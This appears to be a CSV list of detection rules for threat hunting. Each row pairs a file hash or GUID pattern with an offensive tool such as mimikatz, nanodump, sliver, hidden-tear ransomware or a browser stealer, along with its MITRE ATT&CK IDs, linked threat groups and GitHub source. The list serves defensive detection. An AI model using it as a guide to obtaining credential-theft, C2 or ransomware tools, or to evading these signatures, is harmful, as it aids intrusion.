"*5664867318d287a388546bbb20c8d7fb7d24680a97209f4f29d25b9cb9da24ec*",".{0,1000}5664867318d287a388546bbb20c8d7fb7d24680a97209f4f29d25b9cb9da24ec.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","#filehash","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","26950"
"*5669b6b74c00b6c512606e36325d11ea949f88cb29e35e70d4182f3d1d5b7a04*",".{0,1000}5669b6b74c00b6c512606e36325d11ea949f88cb29e35e70d4182f3d1d5b7a04.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26951"
"*566e27a6f2a96e268b6f21b88db8f3488739b0d780e82ac516b3ee14c5fc337f*",".{0,1000}566e27a6f2a96e268b6f21b88db8f3488739b0d780e82ac516b3ee14c5fc337f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26952"
"*567639e3dc4355c549e9c9cc42988325cb95a0f6e86004d5679ad3e15af7c6cd*",".{0,1000}567639e3dc4355c549e9c9cc42988325cb95a0f6e86004d5679ad3e15af7c6cd.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","26954"
"*56860821457ebef4e71091ee01f6abe3703bc83cc56ae6db40ed140ab1c48043*",".{0,1000}56860821457ebef4e71091ee01f6abe3703bc83cc56ae6db40ed140ab1c48043.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26956"
"*56888116d58c75328e0b32af2b26f98c1f79e6b513e436db51aa650efa55a60b*",".{0,1000}56888116d58c75328e0b32af2b26f98c1f79e6b513e436db51aa650efa55a60b.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","26957"
"*568a162e78cabe48a7f30df47b2435b211549e9a7bc7a06f0802b6fc07b7cc94*",".{0,1000}568a162e78cabe48a7f30df47b2435b211549e9a7bc7a06f0802b6fc07b7cc94.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","26958"
"*56937d0eb5b5702acd0a7d19206c3e79b99e5e334544a47b342fb4a845f8f29b*",".{0,1000}56937d0eb5b5702acd0a7d19206c3e79b99e5e334544a47b342fb4a845f8f29b.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26962"
"*5693e15e2266306f4a9f8a0ab4abc687593f5295beb09b7804af997efc05c6a5*",".{0,1000}5693e15e2266306f4a9f8a0ab4abc687593f5295beb09b7804af997efc05c6a5.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","26963"
"*5696de366805239d730793f8bcb78d54bc2e8c07f06795e089dcfc8f6fed8184*",".{0,1000}5696de366805239d730793f8bcb78d54bc2e8c07f06795e089dcfc8f6fed8184.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26964"
"*56997e6f1f96b6ebc89a03491b3f97077a3352730566c48bdb02b4d59d284001*",".{0,1000}56997e6f1f96b6ebc89a03491b3f97077a3352730566c48bdb02b4d59d284001.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","26966"
"*569baf3aa71bcad8c0b978885b98edfc91a16dae9d33a03999269b2c43be3224*",".{0,1000}569baf3aa71bcad8c0b978885b98edfc91a16dae9d33a03999269b2c43be3224.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26968"
"*569d0ac16a89509e1de01deab2fefe2731a48bec2ab7794d9ac0628a6baf2481*",".{0,1000}569d0ac16a89509e1de01deab2fefe2731a48bec2ab7794d9ac0628a6baf2481.{0,1000}","offensive_tool_keyword","BrowserSnatch","steals important data from all chromium and gecko browsers installed in the system and gather the data in a stealer db to be exfiltrated out. A powerful Browser Stealer","T1081 - T1074 - T1114 - T1005 - T1041 - T1027","TA0006 - TA0009 - TA0010","N/A","N/A","Data Exfiltration","https://github.com/shaddy43/BrowserSnatch","1","0","#filehash","N/A","10","3","246","39","2025-03-31T21:04:30Z","2024-08-26T18:38:42Z","26969"
"*56a0e08a01309e17e4e6c753948fd4f341e9a41b1b834b3ce697bffdd90c467b*",".{0,1000}56a0e08a01309e17e4e6c753948fd4f341e9a41b1b834b3ce697bffdd90c467b.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","#filehash","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","26970"
"*56a26ec84de85315d3123471e8b231d593d2bcb0539528c51f47f23a1db2f5dd*",".{0,1000}56a26ec84de85315d3123471e8b231d593d2bcb0539528c51f47f23a1db2f5dd.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","26971"
"*56a4d640936bc70b69883f930565e6abb43377e498836da5e8eba7d5f4f7acf9*",".{0,1000}56a4d640936bc70b69883f930565e6abb43377e498836da5e8eba7d5f4f7acf9.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","26972"
"*56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a*",".{0,1000}56ab5129d379ec39c8037a5937b4ce5cf6680377786548df125b93473e67623a.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26974"
"*56acdd67faeb3b1dd15632102f4cb068acdbdc24e0f78f856824610a8be9ab91*",".{0,1000}56acdd67faeb3b1dd15632102f4cb068acdbdc24e0f78f856824610a8be9ab91.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1134.001 - T1068  - T1055 - T1546.015","TA0004 - TA0006 - TA0011","Ghost Ransomware","N/A","Privilege Escalation","https://github.com/BeichenDream/GodPotato","1","0","#filehash","N/A","10","10","1938","236","2023-11-24T19:22:31Z","2022-12-23T14:37:00Z","26975"
"*56b15b80abb7b1bd3bb80d41347fcd9d26668499220a1dcd7d292714fbd7d350*",".{0,1000}56b15b80abb7b1bd3bb80d41347fcd9d26668499220a1dcd7d292714fbd7d350.{0,1000}","offensive_tool_keyword","VenomousSway","VBA payload generation framework","T1059.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","26978"
"*56b8e87c6016e38e0c6700b97b848441e89777842153de74813a445b3e7fd5dc*",".{0,1000}56b8e87c6016e38e0c6700b97b848441e89777842153de74813a445b3e7fd5dc.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","26979"
"*56bb18010f13a33947c24d31f51e16d8c688cf9c753c1d52f79a9ba64e5c0dca*",".{0,1000}56bb18010f13a33947c24d31f51e16d8c688cf9c753c1d52f79a9ba64e5c0dca.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","26980"
"*56c212ce0a433a9077d17ead7c8bf2a52586c2347c7b2534e141f56ff6ede78d*",".{0,1000}56c212ce0a433a9077d17ead7c8bf2a52586c2347c7b2534e141f56ff6ede78d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26984"
"*56c239dd4b23657f74701ab8943f54ed04f251fd4f6c1fa0d532d1c617945dc4*",".{0,1000}56c239dd4b23657f74701ab8943f54ed04f251fd4f6c1fa0d532d1c617945dc4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26985"
"*56c40fda72d7c0c202d57c7c69690d348ba9bc1a1f133cc6d39cf564d560cb1d*",".{0,1000}56c40fda72d7c0c202d57c7c69690d348ba9bc1a1f133cc6d39cf564d560cb1d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","26986"
"*56c9dd7fe7e9f3e8692fe8e305214cfa2db85424b254f95c97e56e4b35193634*",".{0,1000}56c9dd7fe7e9f3e8692fe8e305214cfa2db85424b254f95c97e56e4b35193634.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26988"
"*56c9dd7fe7e9f3e8692fe8e305214cfa2db85424b254f95c97e56e4b35193634*",".{0,1000}56c9dd7fe7e9f3e8692fe8e305214cfa2db85424b254f95c97e56e4b35193634.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","26989"
"*56cd70d3ff5abc405f93173f800ce0f9e641d4f979e395e3c9e7e9e61f8b1e5f*",".{0,1000}56cd70d3ff5abc405f93173f800ce0f9e641d4f979e395e3c9e7e9e61f8b1e5f.{0,1000}","offensive_tool_keyword","SharpShares","Multithreaded C# .NET Assembly to enumerate accessible network shares in a domain","T1046 - T1135","TA0007 - TA0001","N/A","BlackSuit - Royal - BianLian - Fog","Discovery","https://github.com/mitchmoser/SharpShares","1","0","#filehash","N/A","10","4","351","49","2021-09-21T08:14:27Z","2020-09-25T22:35:57Z","26992"
"*56cf1962ceb2af061aec2e6fd85949b5da5d3ac5da13e9c776f44d15577003e5*",".{0,1000}56cf1962ceb2af061aec2e6fd85949b5da5d3ac5da13e9c776f44d15577003e5.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","26993"
"*56cfc4ef19c92043b59bb88846ffd69725df417bd4c7adf14aa11e29a9428acc*",".{0,1000}56cfc4ef19c92043b59bb88846ffd69725df417bd4c7adf14aa11e29a9428acc.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","#filehash","N/A","7","4","303","47","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z","26994"
"*56d3be8ac6590cb5e593768aa36d4a0d6c39de5c96942e312876c3e0069edeae*",".{0,1000}56d3be8ac6590cb5e593768aa36d4a0d6c39de5c96942e312876c3e0069edeae.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","26995"
"*56d4452909e80c00ed7a13c08ab27673b286a16d9b083a516edb7f45dbc0c4be*",".{0,1000}56d4452909e80c00ed7a13c08ab27673b286a16d9b083a516edb7f45dbc0c4be.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26996"
"*56d7ecdb29ba7613c88c1c5c5f8f3cc88e62a526f0c57d792e43ede489abb6ab*",".{0,1000}56d7ecdb29ba7613c88c1c5c5f8f3cc88e62a526f0c57d792e43ede489abb6ab.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","26998"
"*56e10f1223e7eedb84c5a96f4374565228382393551941b5e15e13127b9e890f*",".{0,1000}56e10f1223e7eedb84c5a96f4374565228382393551941b5e15e13127b9e890f.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27000"
"*56e11018851e99a4fc3492eed467f1ed59fd663b366b49610f2b5c9b891b167a*",".{0,1000}56e11018851e99a4fc3492eed467f1ed59fd663b366b49610f2b5c9b891b167a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27001"
"*56e1e8e6e7add2849ee78462abb30ea40c23d6a1e06036473f82d214bafa9f9a*",".{0,1000}56e1e8e6e7add2849ee78462abb30ea40c23d6a1e06036473f82d214bafa9f9a.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","27002"
"*56ebb8c6ef6890131b7e4c459ae9877a4e0a68500aee14f0c0f55a250c626c87*",".{0,1000}56ebb8c6ef6890131b7e4c459ae9877a4e0a68500aee14f0c0f55a250c626c87.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27004"
"*56f3c70dd9cb4be15fb429491245d75ce48a4cb9d8877f2be6e2493673674606*",".{0,1000}56f3c70dd9cb4be15fb429491245d75ce48a4cb9d8877f2be6e2493673674606.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27005"
"*56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821*",".{0,1000}56f4763af00801c5eb80c39f141a563069669def9f98c1798c0f4b4094f34821.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","#filehash","N/A","9","1","13","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z","27007"
"*56f8e538e4959c62f8d9d5f672a48ebea7883ec573e6df3f4dae69a5f8156eb9*",".{0,1000}56f8e538e4959c62f8d9d5f672a48ebea7883ec573e6df3f4dae69a5f8156eb9.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27008"
"*56F981FD-634A-4656-85A7-5636658E1F94*",".{0,1000}56F981FD\-634A\-4656\-85A7\-5636658E1F94.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","27010"
"*56fa384aada24362640f70277b54bf5d91c3befaf445e5428a60cd44fba2fba1*",".{0,1000}56fa384aada24362640f70277b54bf5d91c3befaf445e5428a60cd44fba2fba1.{0,1000}","offensive_tool_keyword","Prince-Ransomware","Go ransomware utilising ChaCha20 and ECIES encryption.","T1486 - T1489 - T1027","TA0040 - TA0009 ","N/A","N/A","Ransomware","https://github.com/SecDbg/Prince-Ransomware","1","0","#filehash","N/A","10","","N/A","","","","27011"
"*570f6aa0a1c8ad869469cb1dc28b9be6c24fb037f5be2acefbf777dc765eb06b*",".{0,1000}570f6aa0a1c8ad869469cb1dc28b9be6c24fb037f5be2acefbf777dc765eb06b.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27012"
"*570fdc96b43d7e2bc8ee5166053950ff2e235fe741a81ca3733555d1f03a91f7*",".{0,1000}570fdc96b43d7e2bc8ee5166053950ff2e235fe741a81ca3733555d1f03a91f7.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","27013"
"*571ccefde4608492c83836e28b50ebbf92d740d99de43ea35df85f2cf32d9b77*",".{0,1000}571ccefde4608492c83836e28b50ebbf92d740d99de43ea35df85f2cf32d9b77.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27014"
"*571e01606bbaaab8febd88396cb3dd97eb8e883e6597d6a881f8c736eff5a05d*",".{0,1000}571e01606bbaaab8febd88396cb3dd97eb8e883e6597d6a881f8c736eff5a05d.{0,1000}","offensive_tool_keyword","keywa7","The tool that bypasses the firewall's Application Based Rules and lets you connect to anywhere","T1090.001 - T1071.004 - T1071.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/keywa7/keywa7","1","0","#filehash","N/A","6","1","61","9","2024-08-19T08:09:33Z","2024-08-05T15:27:26Z","27015"
